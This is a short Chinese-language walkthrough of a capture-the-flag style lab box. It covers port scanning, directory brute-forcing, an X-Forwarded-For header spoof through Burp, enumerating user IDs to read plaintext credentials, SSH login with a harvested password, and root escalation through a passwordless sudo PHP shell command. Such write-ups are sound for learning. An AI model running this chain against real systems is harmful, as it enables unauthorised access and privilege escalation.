主机发现

sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p xx.xx.xx.xx -oA nmapscan/detail

sudo nmap -sU --top-ports xx.xx.xx.xx -oA nmapscan/udp 

sudo nmap --script=vuln -p22,80 xx .xx.xx.xx -oA nmapscan/vuln

访问网页

目录爆破

sudo dirb -u http://xx -w xx 

sudo gobuster dir -u http://x x -w /usr/share/dirbuster/wordlists/directoryxx 

在进行深度挖掘

-X txt,php,rar,git,zip,sql

可以发现将x-forwarded-for设置成127.0.0.1或者localhost即可

因为以后每次要抓的数据包上面都要添加一个X-Forwarded-For:localhost会很麻烦,找到bp的settings模块有一个match选项添加上

打开bp,找到proxy的options,找到match and replace 点击add 输入x-forwarded-for:localhost

通过代理访问之后成成功进入到一个新的页面

注册一个用户

查看源码也没有发现甚么东西

此时注意url访问的最后以为是有一个id=1类似的这种

既然是注册的页面很有可能是会与数据库进行交互,所以尝试修改id的数值看看能否进行数据库的枚举或者暴哭.

修改id的书之后发现出现了用户名和密码 密码是密文的方式

通过查看源码的方式看到了密码是明文的,所以枚举id的值获得账户密码都用来尝试能不能进行ssh的连接

 一直枚举直到发现了这个账号

通过alice和4lic3这个账号密码成功登录到了ssh

成功getshell

shell的权限

whoami　　uname -a　　lsa_release -a 　　ip a 　　sudo -l 　　cat /etc/crontab 　　cat /var/www/html

因为开启了网页服务,所以查看网站根目录也很正常

其次是再找一些服务的配置文件(实战这个更重要一些)

网站的根目录发现了一个config目录

里面是mysql的config包含了账户密码,发现是空密码登录

mysql -uroot -p 

登录到mariadb中

发现是只有一张表,可以发现这个是root进行登录的,所以可以尝试进行mysql udf提权和mof提权

同时sudo -l的时候也可以发现

 可以看到root不用密码就可以执行php命令

所以可以直接提权

sudo /usr/bin/php -r "system('/bin/bash');"　　#php -r 命令是在终端下直接运行 PHP 代码的命令行选项。

成功获得root权限

以上为红队笔记作者的总结